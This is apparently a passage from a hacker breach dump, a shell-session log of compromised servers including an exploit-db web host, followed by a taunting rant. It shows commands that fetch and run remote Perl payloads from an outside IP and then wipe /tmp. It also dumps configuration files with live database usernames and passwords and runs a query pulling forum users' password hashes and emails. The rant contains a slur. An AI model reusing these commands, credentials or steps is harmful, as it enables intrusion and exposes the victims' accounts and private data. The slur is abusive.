  2424. nginx    12527  0.2  0.0  58160  2404 ?        S    Nov04  63:14 nginx: worker process                  
  2425. nginx    12528  0.1  0.0  57788  1780 ?        S    Nov04  47:43 nginx: worker process                  
  2426. nginx    12529  0.1  0.0  57720  1792 ?        S    Nov04  48:26 nginx: worker process                  
  2427. nginx    12530  0.2  0.0  57584  1620 ?        S    Nov04  61:50 nginx: worker process                  
  2428. nginx    12531  0.2  0.0  57856  1884 ?        S    Nov04  64:09 nginx: worker process                  
  2429. apache   13296  0.7  0.5 411004 46200 ?        S    12:18   0:04 /usr/sbin/httpd
  2430. apache   13709  0.0  0.5 403000 42372 ?        S    Nov24   0:06 /usr/sbin/httpd
  2431. rtstats  15645  1.6  0.1 179260 10884 ?        S    Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
  2432. apache   16268  0.0  0.0  60804  1508 ?        S    Nov19   0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
  2433. apache   17814  0.0  0.0   8704  1040 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2434. apache   17818  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2435. apache   18478  0.0  0.3 391904 28156 ?        S    03:26   0:13 /usr/sbin/httpd
  2436. apache   18960  2.8  0.5 398652 45604 ?        S    12:25   0:05 /usr/sbin/httpd
  2437. apache   19043  2.5  0.4 398116 33464 ?        S    12:25   0:05 /usr/sbin/httpd
  2438. apache   19055  4.9  0.5 405644 41216 ?        S    12:25   0:09 /usr/sbin/httpd
  2439. apache   19056  2.9  0.4 402072 37836 ?        S    12:25   0:05 /usr/sbin/httpd
  2440. apache   19077  2.5  0.4 399132 35544 ?        S    12:25   0:04 /usr/sbin/httpd
  2441. apache   19093  3.0  0.4 397244 34216 ?        S    12:25   0:05 /usr/sbin/httpd
  2442. apache   19094  3.1  0.5 398832 43744 ?        S    12:25   0:05 /usr/sbin/httpd
  2443. apache   19741  0.0  0.0   8704  1028 ?        S    03:29   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2444. apache   19745  0.0  0.0  58608  2616 ?        S    03:29   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2445. apache   19789  2.0  0.4 394212 36988 ?        S    12:27   0:02 /usr/sbin/httpd
  2446. apache   19903  2.4  0.4 396360 37188 ?        S    12:27   0:02 /usr/sbin/httpd
  2447. apache   19945  2.7  0.3 395120 30760 ?        S    12:27   0:02 /usr/sbin/httpd
  2448. apache   20138  3.1  0.3 395072 30492 ?        S    12:27   0:02 /usr/sbin/httpd
  2449. apache   20203  2.0  0.4 394404 35928 ?        S    12:27   0:01 /usr/sbin/httpd
  2450. apache   20274  3.0  0.3 397052 30000 ?        S    12:27   0:02 /usr/sbin/httpd
  2451. apache   20434  0.0  0.3 401880 29916 ?        S    Nov24   0:28 /usr/sbin/httpd
  2452. apache   20439  2.5  0.3 393252 30576 ?        S    12:28   0:01 /usr/sbin/httpd
  2453. apache   22124  0.0  0.4 401232 34788 ?        S    Nov24   0:05 /usr/sbin/httpd
  2454. apache   23720  0.0  0.0   8704  1008 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2455. apache   23722  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2456. apache   24614  0.0  0.0   8704  1020 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2457. apache   24616  0.0  0.0  58608  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2458. apache   24714  0.0  0.1 377988 12680 ?        S    Nov24   0:00 /usr/sbin/httpd
  2459. apache   24719  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2460. apache   24720  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2461. apache   25971  0.0  0.0   8704   828 ?        S    Nov21   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2462. apache   25974  0.0  0.0  58608  1512 ?        S    Nov21   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2463. root     27631  0.0  0.0      0     0 ?        S    Nov23   0:00 [pdflush]
  2464. apache   31023  0.0  0.1 399148  8908 ?        S    Nov23   0:04 /usr/sbin/httpd
  2465. apache   31873  0.0  0.3 388288 25512 ?        S    01:48   0:01 /usr/sbin/httpd
  2466. apache   32062  0.0  0.0   8704  1064 ?        S    01:48   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2467. apache   32067  0.0  0.0  58608  2620 ?        S    01:48   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2468. apache   32288  0.0  0.0   8704   820 ?        S    Nov23   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2469. apache   32289  0.0  0.0  58608  1508 ?        S    Nov23   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2470.  
  2471. $ w
  2472.  12:28:48 up 30 days, 40 min,  1 user,  load average: 0.65, 0.64, 0.66
  2473. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  2474. root     pts/0    sec-sog-2.v99.ch 04:17    8:03m  0.11s  0.11s -bash
  2475.  
  2476. $ ls -lah /home/groups/e/et/ettercap/htdocs/
  2477. total 2.7M
  2478. drwxrwsr-x  8 dummy 18435 2.0K Oct 18  2009 .
  2479. drwxrws--x  5 dummy 18435 1.0K Sep 17  2008 ..
  2480. -rw-r--r--  1 42100 18435 2.2K Dec 21  2004 authors.php
  2481. drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 devel
  2482. -rw-r--r--  1 42100 18435 1.6K Apr 15  2004 download.php
  2483. -rw-r--r--  1 42100 18435 2.7K Apr 24  2004 fingerprint.php
  2484. drwx--x--x 10 42100 18435 2.0K Oct 18  2009 forum
  2485. -rw-r--r--  1 42100 18435 2.2K Apr 15  2004 history.php
  2486. drwxr-xr-x  3 42100 18435 1.0K Aug  9  2008 images
  2487. drwxr-xr-x  2 42100 18435 1.0K Aug  9  2008 includes
  2488. -rw-r--r--  1 42100 18435 4.6K Sep 23  2004 index.php
  2489. -rw-r--r--  1 42100 18435  768 Apr 15  2004 latest.php
  2490. -rw-r--rw-  1 42100 18435    5 Aug 15  2005 latest.stat
  2491. -rw-r--r--  1 42100 18435  886 Apr 15  2004 news.php
  2492. -rw-r--r--  1 42100 18435 5.3K Nov 13  2003 news.txt
  2493. -rw-r--r--  1 42100 18435 2.3M Oct 18  2009 phpBB-3.0.5.zip
  2494. drwxr-xr-x 13 42100 18435 2.0K Oct 18  2009 phpBB3
  2495. -rw-r--r--  1 42100 18435  743 Apr 15  2004 plugins.php
  2496. -rw-r--r--  1 42100 18435  914 May  6  2003 plugins.txt
  2497. drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 release
  2498. -rw-r--r--  1 42100 18435 3.7K Apr 15  2004 screenshots.php
  2499. -rw-r--r--  1 42100 18435 1019 Apr 15  2004 search.php
  2500. -rw-r--r--  1 42100 18435 1.8K Apr 15  2004 stuff.php
  2501. -rw-r--r--  1 42100 18435 1.5K Jan 25  2001 style.css
  2502. -rw-r--rw-  1 42100 18435 3.0K Aug 15  2005 submitted.fingers.txt
  2503. -rw-r--r--  1 42100 18435  12K Jun 24  2005 updateNG.data
  2504. -rw-rw-rw-  1 42100 18435 230K Aug 15  2005 updateNG.log
  2505. -rw-r--r--  1 42100 18435 2.0K Nov  9  2005 updateNG.php
  2506. -rwxr-xr-x  1 42100 18435  201 Jul 13  2003 updateNG.sh
  2507.  
  2508. $ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
  2509. #!/bin/sh
  2510.  
  2511. wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
  2512. chmod 644 updateNG.data
  2513. scp updateNG.data alor@ettercap.sf.net:ettercap
  2514. rm -f updateNG.data
  2515.  
  2516. $ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
  2517. <?php
  2518.  
  2519. //
  2520. // phpBB 2.x auto-generated config file
  2521. // Do not change anything in this file!
  2522. //
  2523.  
  2524. $dbms = "mysql";
  2525.  
  2526. $dbhost = "mysql4-e";
  2527. $dbname = "e17435_etterforum";
  2528. $dbuser = "e17435admin";
  2529. $dbpasswd = "ettersql_a";
  2530.  
  2531. $table_prefix = "phpbb_";
  2532.  
  2533. define('PHPBB_INSTALLED', true);
  2534.  
  2535. define('DEBUG', true);
  2536.  
  2537. ?>
  2538.  
  2539. $ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
  2540. phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank =
  2541. rank_id WHERE user_rank > 0 ORDER BY user_rank
  2566.  
  2567.  
  2568.  ____________________________________________________|_._._._._._._._,
  2569.  \___________________________________________________|_|_|_|_|_|_|_|_|
  2570.                                                      ! ~ exploit-db ~
  2571.                                                                      
  2572. Now we come to a different topic. A topic about people who  leech  off
  2573. what the scene creates  and  call  it  their  own.  About  people  who
  2574. copyright ideas and papers about security  related  topics  that  have
  2575. been around for years. How many  XSS-Papers  are  there  currently  on
  2576. exploit-db? How many retarded strcpy(buf,  argv[1])-papers  are  being
  2577. written over and over  again?  About  whitehats  who  think  releasing
  2578. exploits would make the world much more safe.  And  because  of  fame.
  2579. They all want fame so badly that they do anything  and  everything  in
  2580. order to be part of the security industry. What's even more  hilarious
  2581. is that these "famous" security people keep  getting  owned.  We  mean
  2582. el8, phc, h0no, and zf0  have  all  owned  these  "Security  Rockstar"
  2583. faggots and yet, nothing changes. Or the attacks  are  categorized  as
  2584. "skiddy" behavior. It's ridiculous how terrible the industry is. There
  2585. is no accountability anymore.                                        
  2586.                                                                      
  2587. Still there are some lame skids that need a good spanking.  Stupid  10
  2588. year olds who take perl-exploits to destroy  clan-pages  for  fun  and
  2589. call  themselves  "hackers"  without  knowing  what  they  are  doing.
  2590. Criminals who take exploits to  steal  payment  stuff  for  their  own
  2591. selfish financial gain. And  to  get  their  friends  thrown  in  jail
  2592. (soup). Fame and money... Get the message?                            
  2593.  
  2594. $ uname -a
  2595. Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux
  2596.  
  2597. $ id
  2598. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  2599.  
  2600. $ pwd
  2601. /var/www
  2602.  
  2603. $ ls -la
  2604. total 24180
  2605. drwxr-xr-x 18 www-data www-data     4096 Nov 26 10:16 .
  2606. drwxr-xr-x 19 root     root         4096 Sep 24 09:26 ..
  2607. -rw-r--r--  1 www-data www-data     1005 Nov 12 19:03 .htaccess
  2608. -rw-r--r--  1 www-data www-data      764 Nov  5 17:32 .htaccess.save
  2609. -rw-r--r--  1 www-data www-data  2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
  2610. drwxr-xr-x  4 www-data www-data     4096 Nov 11 07:43 92384723987239847239847234982734
  2611. -rw-r--r--  1 www-data www-data    46149 Nov 11 17:04 apc123456.php
  2612. -rw-r--r--  1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
  2613. -rw-r--r--  1 www-data www-data    18851 Jul  9 14:42 disclosure.html
  2614. -rw-r--r--  1 www-data www-data    11662 Nov 11 11:42 dorkorinos.txt
  2615. drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 edbpartners
  2616. -rw-r--r--  1 www-data www-data     1406 Jul  9 14:53 favicon.ico
  2617. -rw-r--r--  1 www-data www-data     1921 Jul  9 14:42 feature.txt
  2618. -rw-r--r--  1 www-data www-data     1923 Jul 11 16:01 feature1.txt
  2619. drwxr-xr-x 21 www-data www-data     4096 Nov 22 20:06 forums
  2620. drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:41 funny404
  2621. -rw-r--r--  1 www-data www-data     1119 Nov 22 07:45 gd_rss.php
  2622. -rw-r--r--  1 www-data www-data       65 Aug 26 04:53 goaway.php
  2623. -rw-r--r--  1 www-data www-data       53 Jul  9 14:42 googled6c4817aa45e0032.html
  2624. -rw-r--r--  1 www-data www-data        5 Nov 11 07:24 hola.txt
  2625. -rw-r--r--  1 www-data www-data  3154634 Nov 11 07:25 hola.xml
  2626. drwxr-xr-x 15 www-data www-data     4096 Nov 22 15:50 images
  2627. -rw-r--r--  1 www-data www-data      397 Aug 26 04:53 index.php
  2628. drwxr-xr-x  2 www-data www-data     4096 Nov  4 12:20 leetdownloads
  2629. -rw-r--r--  1 www-data www-data      311 Nov 12 18:40 maintenance.php
  2630. drwxr-xr-x  2 root     root         4096 Nov 26 10:18 movies
  2631. -rw-r--r--  1 www-data www-data      106 Aug 26 04:53 news.php
  2632. drwxr-xr-x  2 www-data www-data     4096 Nov 11 17:20 nginx-default
  2633. -rw-r--r--  1 www-data www-data      220 Oct 30 17:00 pagerank.html
  2634. -rw-r--r--  1 www-data www-data      761 Sep  6 06:12 rating.txt
  2635. -rw-r--r--  1 www-data www-data     9122 Aug 18 05:32 readme.html
  2636. -rw-r--r--  1 www-data www-data       47 Jul  9 14:53 robots_ssl.txt
  2637. -rw-r--r--  1 www-data www-data  4007150 Dec  1 07:47 ror.xml
  2638. -rw-r--r--  1 www-data www-data     2102 Sep  1 05:40 rss.php
  2639. drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 scripts
  2640. -rw-r--r--  1 www-data www-data     1056 Sep  3 18:05 search-mobile.php
  2641. -rw-r--r--  1 www-data www-data      108 Aug 26 04:53 search.php
  2642. -rw-r--r--  1 www-data www-data  3337393 Dec  1 07:47 sitemap.xml
  2643. -rw-r--r--  1 www-data www-data     3462 Aug 19 11:37 sitemap.xsl
  2644. -rw-r--r--  1 www-data www-data    30533 Nov 30 17:52 sitemap_blog.xml
  2645. -rw-r--r--  1 www-data www-data     4229 Nov 30 17:52 sitemap_blog.xml.gz
  2646. drwxr-xr-x  3 www-data www-data     4096 Jul  9 14:42 slider
  2647. drwxr-xr-x  2 www-data www-data    20480 Dec  4 09:18 sploits
  2648. -rw-r--r--  1 www-data www-data     9621 Nov  3 19:52 style.css
  2649. drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:40 testme
  2650. -rw-r--r--  1 www-data www-data     5699 Nov  4 07:22 tpl_search.php
  2651. -rw-r--r--  1 www-data www-data       16 Nov 28 06:52 update-982374.txt
  2652. -rw-r--r--  1 www-data www-data       50 Aug 26 04:53 updated.php
  2653. drwxr-xr-x  3 www-data www-data     4096 Aug  3 09:35 videos
  2654. -rw-r--r--  1 www-data www-data     4391 Aug 26 04:53 wp-activate.php
  2655. drwxr-xr-x  8 www-data www-data     4096 Nov 11 17:59 wp-admin
  2656. -rw-r--r--  1 www-data www-data    40284 Aug 26 04:53 wp-app.php
  2657. -rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-atom.php
  2658. -rw-r--r--  1 www-data www-data      274 Aug 26 04:53 wp-blog-header.php
  2659. -rw-r--r--  1 www-data www-data     3926 Aug 26 04:53 wp-comments-post.php
  2660. -rw-r--r--  1 www-data www-data      238 Aug 26 04:53 wp-commentsrss2.php
  2661. -rw-r--r--  1 www-data www-data     3173 Aug 26 04:53 wp-config-sample.php
  2662. -rw-r--r--  1 www-data www-data     2832 Nov 11 17:59 wp-config.php
  2663. drwxr-xr-x  8 www-data www-data     4096 Dec  3 22:49 wp-content
  2664. -rw-r--r--  1 www-data www-data     1255 Aug 26 04:53 wp-cron.php
  2665. -rw-r--r--  1 www-data www-data      240 Aug 26 04:53 wp-feed.php
  2666. drwxr-xr-x  7 www-data www-data     4096 Sep  8 13:52 wp-includes
  2667. -rw-r--r--  1 www-data www-data     2002 Aug 26 04:53 wp-links-opml.php
  2668. -rw-r--r--  1 www-data www-data     2441 Aug 26 04:53 wp-load.php
  2669. -rw-r--r--  1 www-data www-data    26160 Sep  3 21:48 wp-login.php
  2670. -rw-r--r--  1 www-data www-data     7774 Aug 26 04:53 wp-mail.php
  2671. -rw-r--r--  1 www-data www-data      487 Aug 26 04:53 wp-pass.php
  2672. -rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rdf.php
  2673. -rw-r--r--  1 www-data www-data      316 Aug 26 04:53 wp-register.php
  2674. -rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rss.php
  2675. -rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-rss2.php
  2676. -rw-r--r--  1 www-data www-data     9177 Sep  8 13:01 wp-settings.php
  2677. -rw-r--r--  1 www-data www-data    18695 Aug 26 04:53 wp-signup.php
  2678. -rw-r--r--  1 www-data www-data     3702 Aug 26 04:53 wp-trackback.php
  2679. -rw-r--r--  1 www-data www-data    93955 Aug 26 04:53 xmlrpc-orig.php
  2680. -rw-r--r--  1 www-data www-data    94184 Aug 26 04:53 xmlrpc.php
  2681.  
  2682.  
  2683. $ cat wp-config.php
  2684. <?php
  2685. /**
  2686.  * The base configurations of the WordPress.
  2687.  *
  2688.  * This file has the following configurations: MySQL settings, Table Prefix,
  2689.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
  2690.  * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  2691.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  2692.  *
  2693.  * This file is used by the wp-config.php creation script during the
  2694.  * installation. You don't have to use the web site, you can just copy this file
  2695.  * to "wp-config.php" and fill in the values.
  2696.  *
  2697.  * @package WordPress
  2698.  */
  2699.  
  2700. // ** MySQL settings - You can get this info from your web host ** //
  2701. /** The name of the database for WordPress */
  2702. //define('DB_NAME', 'explot2');
  2703. define('WP_CACHE', true); //Added by WP-Cache Manager
  2704. define('DB_NAME', 'edb_new');
  2705.  
  2706. /** MySQL database username */
  2707. define('DB_USER', 'edbuser');
  2708.  
  2709. /** MySQL database password */
  2710. //define('DB_PASSWORD', 'admin123');
  2711. define('DB_PASSWORD', '2834729347928372342');
  2712. //define('DB_PASSWORD', 'f00b204e98009d22b68e54a');
  2713.  
  2714. /** MySQL hostname */
  2715. define('DB_HOST', 'localhost');
  2716. define('WP_MEMORY_LIMIT', '1024M');
  2717. /** Database Charset to use in creating database tables. */
  2718. define('DB_CHARSET', 'utf8');
  2719.  
  2720. /** The Database Collate type. Don't change this if in doubt. */
  2721. define('DB_COLLATE', '');
  2722. define('FORCE_SSL_LOGIN', true);
  2723.  
  2724. /**#@+
  2725.  * Authentication Unique Keys.
  2726.  *
  2727.  * Change these to different unique phrases!
  2728.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
  2729.  * You can change these at any point in time to invalidate all existing cookies. This will force all users
  2730.  in again.
  2731.  *
  2732.  * @since 2.6.0
  2733.  */
  2734. define('AUTH_KEY', 'put your unique phrase here');
  2735. define('SECURE_AUTH_KEY', 'put your unique phrase here');
  2736. define('LOGGED_IN_KEY', 'put your unique phrase here');
  2737. define('NONCE_KEY', 'put your unique phrase here');
  2738. /**#@-*/
  2739.  
  2740. /**
  2741.  * WordPress Database Table prefix.
  2742.  *
  2743.  * You can have multiple installations in one database if you give each a unique
  2744.  * prefix. Only numbers, letters, and underscores please!
  2745.  */
  2746. $table_prefix  = 'wp_';
  2747.  
  2748. /**
  2749.  * WordPress Localized Language, defaults to English.
  2750.  *
  2751.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  2752.  * language must be installed to wp-content/languages. For example, install
  2753.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  2754.  * language support.
  2755.  */
  2756. define ('WPLANG', '');
  2757.  
  2758. /* That's all, stop editing! Happy blogging. */
  2759.  
  2760. /** Absolute path to the WordPress directory. */
  2761. if ( !defined('ABSPATH') )
  2762.         define('ABSPATH', dirname(__FILE__) . '/');
  2763.  
  2764. /** Sets up WordPress vars and included files. */
  2765. require_once(ABSPATH . 'wp-settings.php');
  2766.  
  2767. define('WP_DEBUG',true);
  2768. define('WP_MEMORY_LIMIT', '128M');
  2769.  
  2770. $ cd forums
  2771.  
  2772. $ ls -la
  2773. total 2344
  2774. drwxr-xr-x 21 www-data www-data   4096 Nov 22 20:06 .
  2775. drwxr-xr-x 18 www-data www-data   4096 Nov 26 10:16 ..
  2776. -rw-r--r--  1 www-data www-data   1008 Nov  6 12:03 .htaccess
  2777. -rw-rw-r--  1 www-data www-data  17862 Nov 22 20:01 LICENSE
  2778. drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp
  2779. drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp-23987239874298273987234
  2780. -rwxr-xr-x  1 www-data www-data  40193 Nov 22 20:01 ajax.php
  2781. -rwxr-xr-x  1 www-data www-data  75603 Nov 22 20:01 album.php
  2782. -rwxr-xr-x  1 www-data www-data  19119 Nov 22 20:01 announcement.php
  2783. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 archive
  2784. -rwxr-xr-x  1 www-data www-data   9040 Nov 22 20:01 asset.php
  2785. -rwxr-xr-x  1 www-data www-data  21161 Nov 22 20:01 assetmanage.php
  2786. -rwxr-xr-x  1 www-data www-data  15788 Nov 22 20:01 attachment.php
  2787. -rwxr-xr-x  1 www-data www-data   6935 Nov 22 20:01 attachment_inlinemod.php
  2788. -rwxr-xr-x  1 www-data www-data   3616 Nov 22 20:01 blog_attachment.php
  2789. -rwxr-xr-x  1 www-data www-data  96121 Nov 22 20:01 calendar.php
  2790. -rwxr-xr-x  1 www-data www-data     43 Nov 22 20:01 clear.gif
  2791. drwxr-xr-x  9 www-data www-data   4096 Nov  6 11:22 clientscript
  2792. -rwxr-xr-x  1 www-data www-data  15786 Nov 22 20:01 converse.php
  2793. drwxr-xr-x  7 www-data www-data   4096 Nov  6 11:22 cpstyles
  2794. -rwxr-xr-x  1 www-data www-data   3309 Nov 22 20:01 cron.php
  2795. -rwxr-xr-x  1 www-data www-data   6145 Nov 22 20:01 css.php
  2796. drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customavatars
  2797. drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customgroupicons
  2798. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 customprofilepics
  2799. -rwxr-xr-x  1 www-data www-data   1823 Nov 22 20:01 editor.php
  2800. -rwxr-xr-x  1 www-data www-data  47010 Nov 22 20:01 editpost.php
  2801. -rwxr-xr-x  1 www-data www-data   1427 Nov 22 20:01 entry.php
  2802. -rwxr-xr-x  1 www-data www-data  30084 Nov 22 20:01 external.php
  2803. -rwxr-xr-x  1 www-data www-data   9966 Nov 22 20:01 faq.php
  2804. -rwxr-xr-x  1 www-data www-data  10134 Nov 22 20:01 favicon.ico
  2805. -rwxr-xr-x  1 www-data www-data  23332 Nov 22 20:01 forum.php
  2806. -rwxr-xr-x  1 www-data www-data  42452 Nov 22 20:01 forumdisplay.php
  2807. -rwxr-xr-x  1 www-data www-data   2066 Nov 22 20:01 global.php
  2808. -rwxr-xr-x  1 www-data www-data 155838 Nov 22 20:01 group.php
  2809. -rwxr-xr-x  1 www-data www-data  26150 Nov 22 20:01 group_inlinemod.php
  2810. -rwxr-xr-x  1 www-data www-data  11883 Nov 22 20:01 groupsubscription.php
  2811. -rwxr-xr-x  1 www-data www-data   9039 Nov 22 20:01 image.php
  2812. drwxr-xr-x 24 www-data www-data   4096 Nov  6 13:16 images
  2813. drwxr-xr-x  8 www-data www-data  12288 Nov  6 14:29 includes
  2814. -rwxr-xr-x  1 www-data www-data   2396 Nov 22 20:01 index.php
  2815. -rwxr-xr-x  1 www-data www-data  47021 Nov 22 20:01 infraction.php
  2816. -rwxr-xr-x  1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
  2817. -rwxr-xr-x  1 www-data www-data  11440 Nov 22 20:01 joinrequests.php
  2818. -rwxr-xr-x  1 www-data www-data   1757 Nov 22 20:01 list.php
  2819. -rwxr-xr-x  1 www-data www-data  10947 Nov 22 20:01 login.php
  2820. -rwxr-xr-x  1 www-data www-data  30244 Nov 22 20:01 member.php
  2821. -rwxr-xr-x  1 www-data www-data  16392 Nov 22 20:01 member_inlinemod.php
  2822. -rwxr-xr-x  1 www-data www-data  40345 Nov 22 20:01 memberlist.php
  2823. -rwxr-xr-x  1 www-data www-data  22264 Nov 22 20:01 misc.php
  2824. drwxr-xr-x  2 www-data www-data   4096 Nov 22 20:01 modcp
  2825. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:55 modcp-23987239874298273987234
  2826. -rwxr-xr-x  1 www-data www-data  76827 Nov 22 20:01 moderation.php
  2827. -rwxr-xr-x  1 www-data www-data   6779 Nov 22 20:01 moderator.php
  2828. -rwxr-xr-x  1 www-data www-data  17552 Nov 22 20:01 newattachment.php
  2829. -rwxr-xr-x  1 www-data www-data  41079 Nov 22 20:01 newreply.php
  2830. -rwxr-xr-x  1 www-data www-data  20185 Nov 22 20:01 newthread.php
  2831. -rwxr-xr-x  1 www-data www-data  21802 Nov 22 20:01 online.php
  2832. drwxr-xr-x  5 www-data www-data   4096 Nov  6 11:22 packages
  2833. -rwxr-xr-x  1 www-data www-data   8096 Nov 22 20:01 payment_gateway.php
  2834. -rwxr-xr-x  1 www-data www-data  13360 Nov 22 20:01 payments.php
  2835. -rwxr-xr-x  1 www-data www-data   4156 Nov 22 20:01 picture.php
  2836. -rwxr-xr-x  1 www-data www-data  16665 Nov 22 20:01 picture_inlinemod.php
  2837. -rwxr-xr-x  1 www-data www-data  26169 Nov 22 20:01 picturecomment.php
  2838. -rwxr-xr-x  1 www-data www-data  29338 Nov 22 20:01 poll.php
  2839. -rwxr-xr-x  1 www-data www-data  10414 Nov 22 20:01 posthistory.php
  2840. -rwxr-xr-x  1 www-data www-data  76585 Nov 22 20:01 postings.php
  2841. -rwxr-xr-x  1 www-data www-data   7087 Nov 22 20:01 printthread.php
  2842. -rwxr-xr-x  1 www-data www-data  79435 Nov 22 20:01 private.php
  2843. -rwxr-xr-x  1 www-data www-data 163695 Nov 22 20:01 profile.php
  2844. -rwxr-xr-x  1 www-data www-data  56363 Nov 22 20:01 register.php
  2845. -rwxr-xr-x  1 www-data www-data   7294 Nov 22 20:01 report.php
  2846. -rwxr-xr-x  1 www-data www-data  14765 Nov 22 20:01 reputation.php
  2847. -rwxr-xr-x  1 www-data www-data  35793 Nov 22 20:01 search.php
  2848. -rwxr-xr-x  1 www-data www-data  22710 Nov 22 20:01 sendmessage.php
  2849. -rwxr-xr-x  1 www-data www-data  12485 Nov 22 20:01 showgroups.php
  2850. -rwxr-xr-x  1 www-data www-data  12738 Nov 22 20:01 showpost.php
  2851. -rwxr-xr-x  1 www-data www-data  80115 Nov 22 20:01 showthread.php
  2852. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 signaturepics
  2853. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 store_sitemap
  2854. -rwxr-xr-x  1 www-data www-data  38862 Nov 22 20:01 subscription.php
  2855. -rwxr-xr-x  1 www-data www-data   5399 Nov 22 20:01 tags.php
  2856. -rwxr-xr-x  1 www-data www-data   8800 Nov 22 20:01 threadrate.php
  2857. -rwxr-xr-x  1 www-data www-data  11146 Nov 22 20:01 threadtag.php
  2858. -rwxr-xr-x  1 www-data www-data     61 Nov 22 20:01 uploadprogress.gif
  2859. -rwxr-xr-x  1 www-data www-data  39717 Nov 22 20:01 usercp.php
  2860. -rwxr-xr-x  1 www-data www-data  21034 Nov 22 20:01 usernote.php
  2861. drwxr-xr-x 13 www-data www-data   4096 Nov  6 11:22 vb
  2862. drwxr-xr-x  8 www-data www-data   4096 Nov  6 12:23 vboptimise
  2863. -rw-r--r--  1 www-data www-data   2324 Nov  6 12:23 vboptimise.php
  2864. drwxr-xr-x  4 www-data www-data   4096 Nov  6 11:55 vbseo
  2865. -rw-r--r--  1 www-data www-data  45286 Nov  6 11:55 vbseo.php
  2866. drwxr-xr-x  4 www-data www-data   4096 Nov  6 14:29 vbseo_sitemap
  2867. -rw-r--r--  1 www-data www-data   4335 Nov  6 11:55 vbseocp.php
  2868. -rwxr-xr-x  1 www-data www-data  27879 Nov 22 20:01 visitormessage.php
  2869. -rwxr-xr-x  1 www-data www-data   1761 Nov 22 20:01 widget.php
  2870. -rwxr-xr-x  1 www-data www-data   3952 Nov 22 20:01 xmlsitemap.php
  2871.  
  2872. $ cat includes/config.php
  2873. <?php
  2874. /*======================================================================*\
  2875. || #################################################################### ||
  2876. || # vBulletin 4.0.8
